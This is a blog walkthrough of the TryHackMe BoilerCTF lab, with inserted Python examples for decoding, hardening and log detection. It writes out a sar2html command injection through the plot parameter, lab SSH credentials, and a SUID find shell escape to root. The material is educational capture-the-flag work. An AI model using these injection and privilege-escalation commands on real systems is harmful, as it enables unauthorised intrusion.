DEV Community

Mikail Kakabayev

TryHackMe | BoilerCTF | WALKTHROUGH

LAB: BoilerCTF (TryHackMe)
DIFFICULTY: Medium
TARGET: root.txt
TOOLS: Nmap, Gobuster
VULNERABLE: SAR2HTML 3.2.1 (RCE)

We'll gain root privileges and capture root.txt by exploiting SAR2HTML 3.2.1 (RCE).

We start with an Nmap scan to discover open ports and running services on the target machine.

nmap -sC -sV {LABS_IP_ADDRESS}

Flags:

  • -sC - Runs Nmap's default set of safe scripts
  • -sV - Probes open ports to identify service versions

Breakdown:

  • Port 21 (FTP) — Anonymous login is enabled. This means anyone can connect without a password. We'll log in and see if any files are accessible.

  • Port 80 (HTTP) — An Apache web server. The presence of /robots.txt suggests there may be hidden directories. We'll use Gobuster or FFUF to find them.

  • Port 10000 (Webmin) — A web-based administration panel. This could be a path to root if we find credentials or a known exploit.

Let's see what we have on FTP:

There is a hidden file called .info.txt.
We can download it with the get command and check what's inside.

get .info.txt

Here we have ROT13-encoded text. We can decode it with the following command:

echo "Whfg jnagrq gb frr vs lbh svaq vg. Yby. Erzrzore: Rahzrengvba vf gur xrl" | tr 'A-Za-z' 'N-ZA-Mn-za-m'

After decoding, we get nothing interesting here. So let's continue.

We have robots.txt and Webmin admin running on port 10000.

Let's first check robots.txt.

The robots.txt file contained multiple disallowed paths. Most appear to be rabbit holes (the creator literally includes /a+rabbit as an entry). Entries like /.ssh and /tmp are not web-accessible and can be ignored.

Below the robots.txt entries, I found ASCII decimal numbers:

079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 089 109 070 104 078 084 069 049 079 068 081 075

Each number represents an ASCII character code. After decoding, I got:

OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK

This looks like Base64. Let's decode it:

echo "OTliMDY2MGNkOTVhZGVhMzI3YzU0MTgyYmFhNTE1ODQK" | base64 -d

This appears to be a hash or key. I'll save it for now, though it may be another rabbit hole.
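To make the decoding steps above reproducible, here is an added example (not code from the original post) that performs the ROT13 decode of the FTP note and the decimal-ASCII-then-Base64 decode of the robots.txt blob in Python, with the two quoted strings embedded as input. decode_layers goes a little beyond the single case on the page: it peels Base64 layers for as long as the result still looks like Base64 and stops when it reaches a 32/40/64-character hex digest, labelling each stage so the intermediate values stay visible.

```python
# Added example (not from the original post): decoders for the encodings met
# during enumeration: ROT13 for the FTP note, then decimal ASCII codes followed
# by Base64 for the robots.txt blob.  The two inputs are the strings quoted
# in the post.
import base64
import codecs
import re

FTP_NOTE = ("Whfg jnagrq gb frr vs lbh svaq vg. Yby. "
            "Erzrzore: Rahzrengvba vf gur xrl")

ROBOTS_CODES = (
    "079 084 108 105 077 068 089 050 077 071 078 107 079 084 086 104 "
    "090 071 086 104 077 122 073 051 089 122 085 048 077 084 103 121 "
    "089 109 070 104 078 084 069 049 079 068 081 075"
)


def rot13(text: str) -> str:
    """Same mapping as `tr 'A-Za-z' 'N-ZA-Mn-za-m'`; ROT13 is its own inverse."""
    return codecs.decode(text, "rot_13")


def decimal_ascii(blob: str) -> str:
    """Turn a whitespace-separated list of decimal codes into text.
    Anything outside 7-bit ASCII is rejected so a list of unrelated numbers
    is not silently turned into garbage."""
    codes = [int(tok) for tok in blob.split()]
    if any(not 0 <= c < 128 for c in codes):
        raise ValueError("not a plain ASCII code list")
    return "".join(chr(c) for c in codes)


def classify(text: str) -> str:
    """Decide what the next decoding step should be.  Hex digests are
    checked first because a 32/40/64-character hex string also passes the
    Base64 shape test and would otherwise be decoded into binary noise."""
    s = text.strip()
    if re.fullmatch(r"(?:[0-9a-f]{32}|[0-9a-f]{40}|[0-9a-f]{64})", s):
        return "hex-digest"
    if len(s) % 4 == 0 and re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", s):
        return "base64"
    return "text"


def decode_layers(blob: str, max_layers: int = 4) -> list:
    """Peel encodings one layer at a time and return (label, value) pairs.
    Order: decimal ASCII first, then Base64 while the result still looks
    like Base64; stops at a hex digest, plain text, or binary output."""
    value = decimal_ascii(blob)
    stages = [("ascii", value)]
    for _ in range(max_layers):
        kind = classify(value)
        if kind != "base64":
            stages.append((kind, value.strip()))
            break
        raw = base64.b64decode(value.strip(), validate=True)
        try:
            value = raw.decode("ascii")
        except UnicodeDecodeError:
            stages.append(("binary-hex", raw.hex()))  # not text: show bytes as hex
            break
        stages.append(("base64-decoded", value))
    return stages


if __name__ == "__main__":
    print("FTP note:", rot13(FTP_NOTE))
    for label, value in decode_layers(ROBOTS_CODES):
        print(f"robots.txt [{label}]: {value.strip()}")
```

Running it prints the ROT13 plaintext and then each stage of the robots.txt blob, ending with the label hex-digest, which is why the post treats the final value as a hash or key.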

Next, I used Gobuster to discover hidden directories on the web server.

As a result, we have the /joomla and /manual directories.

Let's try /manual.

It's just the Apache documentation. Nothing interesting here.

Now, let's try /joomla.

It's a small webpage. I did some research but found nothing except a login form.

I tested the login page for information disclosure by entering invalid credentials and analyzing the error messages. When I try 1 (for the username) and 1234 (for the password), it says:

Warning
JUser::_load: Unable to load user with ID: 1
Username and password do not match or you do not have an account yet.

When I entered 1 (a number) as the username, Joomla's backend tried to load user ID 1 (the default admin account) instead of treating 1 as a username string. The error Unable to load user with ID: 1 suggests:

  • User ID 1 exists in the database

  • But something is wrong (maybe the account is disabled, deleted, or corrupted)

This is a minor information disclosure vulnerability, but I couldn't go far with it.

Let's run Gobuster again for http://{LABS_IP_ADDRESS}/joomla/ and check what we get next.

Checking interesting directories such as /_archive, /_files, /_database and /temp, I found some notes which are not really important. But in /_files, I found a Base64-encoded text and decoded it.

V2hvcHNpZSBkYWlzeQo=

I'll also keep this for future use.

Now let's check /administrator.

I found one more login page and tried some basic vulnerability tests, but still nothing.

Now let's try the /_test endpoint.

It gave me:

It runs SAR2HTML, a tool designed for system administrators. I found that SAR2HTML 3.2.1 contains a critical security flaw (Remote Command Execution). The application takes user input (specifically the plot parameter in the URL) and passes it directly to the server's operating system without checking whether it is safe. Because there is no sanitization, the server can be made to run arbitrary commands by appending a semicolon (;) or a pipe (|) followed by a command to the URL.

By checking https://www.exploit-db.com/exploits/47204, we understand that http://<ipaddr>/index.php?plot=;<command-here> is going to execute the command that we want. I entered a basic command to check if it works.
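As an added example (not the sar2html source, whose actual code the post does not show), here is the request-handling pattern the paragraph above describes: a vulnerable builder that splices plot into a shell string, next to a hardened one that allow-lists the value and passes it as a single argv element with no shell involved, plus a detector that flags the same ";" footprint in Apache access-log lines. SAR_DIR, the function names and the log lines are constructed for this demo.

```python
# Added example (not the sar2html source): the request-handling pattern behind
# the plot-parameter flaw, a vulnerable builder next to a hardened one, plus a
# detector for the same pattern in Apache access logs.  SAR_DIR, the handler
# names and SAMPLE_LOG are constructed for this demo.
import re
import subprocess
from urllib.parse import unquote_plus

SAR_DIR = "/var/log/sa"                              # assumed location of sar data files
SAFE_NAME = re.compile(r"[A-Za-z0-9_.-]{1,64}")     # allow-list for plot names
SHELL_META = re.compile(r"[;|&`$(){}<>\n]")          # characters that end or chain a command


def vulnerable_command(plot: str) -> str:
    """The flawed pattern: the request parameter is spliced into a shell
    string.  Returned rather than executed so the effect of ';' is visible."""
    return f"sar -f {SAR_DIR}/{plot}"


def hardened_argv(plot: str):
    """Allow-list the value and build an argv list, so the value is exactly
    one argument to sar and is never parsed by a shell.  None means reject."""
    if not SAFE_NAME.fullmatch(plot) or ".." in plot:
        return None
    return ["sar", "-f", f"{SAR_DIR}/{plot}"]


def run_report(plot: str) -> str:
    """Run the hardened form with shell=False (no shell, so no injection)."""
    argv = hardened_argv(plot)
    if argv is None:
        raise ValueError("rejected plot name")
    done = subprocess.run(argv, capture_output=True, text=True, check=False)
    return done.stdout


def query_param(request_target: str, name: str):
    """Pull one parameter out of a request target by hand rather than with
    parse_qs, whose treatment of ';' as a separator changed across Python
    versions, and ';' is exactly the character we want to keep."""
    _, _, query = request_target.partition("?")
    for pair in query.split("&"):
        key, _, val = pair.partition("=")
        if key == name:
            return unquote_plus(val)
    return None


LOG_RE = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/')


def flag_injection(log_lines, param="plot"):
    """Return (client_ip, decoded_value) for requests whose plot parameter
    carries shell metacharacters: the server-side footprint of the step
    described in the write-up."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        value = query_param(m.group(2), param)
        if value is not None and SHELL_META.search(value):
            hits.append((m.group(1), value))
    return hits


# constructed Apache combined-log lines, not taken from the lab machine
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /joomla/_test/index.php?plot=NEW HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /joomla/_test/index.php?plot=;ls HTTP/1.1" 200 1024',
    '10.0.0.9 - - [01/Jan/2024:10:00:05 +0000] "GET /joomla/_test/index.php?plot=;cat+log.txt HTTP/1.1" 200 2048',
    '10.0.0.7 - - [01/Jan/2024:10:00:09 +0000] "GET /joomla/index.php HTTP/1.1" 200 300',
]

if __name__ == "__main__":
    print(vulnerable_command(";ls"))      # the spliced shell string
    print(hardened_argv(";ls"))           # None: rejected by the allow-list
    for ip, val in flag_injection(SAMPLE_LOG):
        print(f"suspicious request from {ip}: plot={val!r}")
```

The allow-list is the fix that matters: stripping ";" and "|" alone would leave the other metacharacters in SHELL_META, whereas accepting only a short, well-defined name and never invoking a shell closes the whole class. The log detector is the cheap retrospective check for the same pattern on a server that has already been exposed.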

I changed http://{LABS_IP_ADDRESS}/joomla/_test/index.php?plot=NEW to http://{LABS_IP_ADDRESS}/joomla/_test/index.php?plot=;ls and BOOM!

It displays the files from the current directory.

Let's see what's inside the log.txt file by typing:

http://{LABS_IP_ADDRESS}/joomla/_test/index.php?plot=;cat+log.txt

We can see that there are users called basterd and pentest, including a password, which is superduperp@$$.

In the Nmap scan, there is SSH running on port 55007.

Let's try to login using the credentials that we found.

And we're in.

There is a backup.sh file in the current directory. Let's check it.

REMOTE=1.2.3.4

SOURCE=/home/stoner
TARGET=/usr/local/backup

LOG=/home/stoner/bck.log

DATE=`date +%y\.%m\.%d\.`

USER=stoner
#superduperp@$$no1knows

ssh $USER@$REMOTE mkdir $TARGET/$DATE


if [ -d "$SOURCE" ]; then
    for i in `ls $SOURCE | grep 'data'`;do
        echo "Begining copy of" $i  >> $LOG
        scp  $SOURCE/$i $USER@$REMOTE:$TARGET/$DATE
        echo $i "completed" >> $LOG

        if [ -n `ssh $USER@$REMOTE ls $TARGET/$DATE/$i 2>/dev/null` ];then
           rm $SOURCE/$i
           echo $i "removed" >> $LOG
           echo "####################" >> $LOG
                else
                    echo "Copy not complete" >> $LOG
                    exit 0
        fi 
    done


else

    echo "Directory is not present" >> $LOG
    exit 0
fi

I found a username and a password in the code:

USER=stoner
#superduperp@$$no1knows

Let's try to login.

There is a .secret file.

  • user.txt => You made it till here, well done.

Now we need root access to gain full control over the system. So I did some digging, and identified SUID binaries by running find / -perm -4000 2>/dev/null.

We have /usr/bin/find, /usr/bin/sudo and /usr/bin/passwd.

Let's try /usr/bin/find first. I looked at https://gtfobins.org/gtfobins/find/ and tried to exploit it using find . -exec /bin/sh -p \; -quit. Just prefix the command with /usr/bin/ so the full path to find is used:

/usr/bin/find . -exec /bin/sh -p \; -quit

And now we're the root user.

  • What did you exploit to get the privileged user? find
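From the defender's side, the same find / -perm -4000 inventory can be turned into a triage. This is an added example, not code from the post: it sorts set-uid files into expected system binaries, known shell-escape candidates (the watch-list here is a short constructed subset; GTFOBins, linked above, is the full catalogue) and everything else for review. The SAMPLE list and the two name sets are constructed; walk_setuid does the live enumeration when you want to run it against a real filesystem.

```python
# Added example (not from the original post): the defender's counterpart of
# the `find / -perm -4000` step.  Lists set-uid files and sorts them into
# "expected" system binaries, "dangerous" ones known to hand out a shell when
# set-uid, and "review" for anything else.  The two name sets and SAMPLE are
# constructed for this demo.
import os
import stat

# set-uid on these is normal on most Linux systems
EXPECTED_SUID = {"passwd", "sudo", "su", "mount", "umount", "chsh",
                 "chfn", "gpasswd", "newgrp", "pkexec"}
# constructed short watch-list; GTFOBins is the full catalogue
DANGEROUS_SUID = {"find", "vim", "vi", "python", "python3", "perl",
                  "bash", "sh", "nmap", "less", "more", "env", "cp", "mv"}


def is_setuid(mode: int) -> bool:
    """Regular file with the set-uid bit, i.e. what -perm -4000 reports."""
    return stat.S_ISREG(mode) and bool(mode & stat.S_ISUID)


def classify(path: str, mode: int) -> str:
    """Bucket one (path, st_mode) pair by basename."""
    name = os.path.basename(path)
    if not is_setuid(mode):
        return "not-suid"
    if name in DANGEROUS_SUID:
        return "dangerous"
    if name in EXPECTED_SUID:
        return "expected"
    return "review"


def audit(entries):
    """entries: iterable of (path, st_mode).  Returns a dict mapping each
    category to a sorted list of paths; files without set-uid are dropped."""
    report = {"dangerous": [], "expected": [], "review": []}
    for path, mode in entries:
        category = classify(path, mode)
        if category != "not-suid":
            report[category].append(path)
    return {k: sorted(v) for k, v in report.items()}


def walk_setuid(root="/"):
    """Live enumeration: yield (path, st_mode) for set-uid regular files under
    root.  Unreadable directories are skipped, mirroring 2>/dev/null; lstat
    is used so symlinks are not followed."""
    for dirpath, _dirs, files in os.walk(root, onerror=lambda _e: None):
        for fn in files:
            path = os.path.join(dirpath, fn)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if is_setuid(st.st_mode):
                yield path, st.st_mode


# constructed sample: the three binaries named in the post, one file without
# set-uid, and one unknown set-uid helper that should land in "review"
SAMPLE = [
    ("/usr/bin/find", 0o104755),
    ("/usr/bin/sudo", 0o104755),
    ("/usr/bin/passwd", 0o104755),
    ("/usr/bin/ls", 0o100755),
    ("/usr/local/bin/backup-helper", 0o104750),
]

if __name__ == "__main__":
    # set AUDIT_LIVE=1 to walk the real filesystem instead of the sample
    source = walk_setuid("/") if os.environ.get("AUDIT_LIVE") else SAMPLE
    for category, paths in audit(source).items():
        for p in paths:
            print(f"{category:10s} {p}")
```

On this box the report would put /usr/bin/find under "dangerous", which is exactly the finding the walkthrough acts on; a hardening pass would remove the set-uid bit from it (chmod u-s) and then re-run the audit to confirm.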

Now we can get the root flag by navigating to the /root directory and printing the file.

We got the root.txt!

  • root.txt => It wasn't that hard, was it?

Quick note: I kept this guide clean and focused on what worked. In reality, I tested many other endpoints, forms, and pages — but showing all those dead ends would've made this too messy.

I'm still learning, so this walkthrough may not be perfect. If you find an error or a better approach, please reach out — I'd genuinely appreciate the feedback.

Hope you learned something useful! Questions? Feel free to ask — I'm happy to help. 👍

https://www.linkedin.com/in/mikail-kakabayev
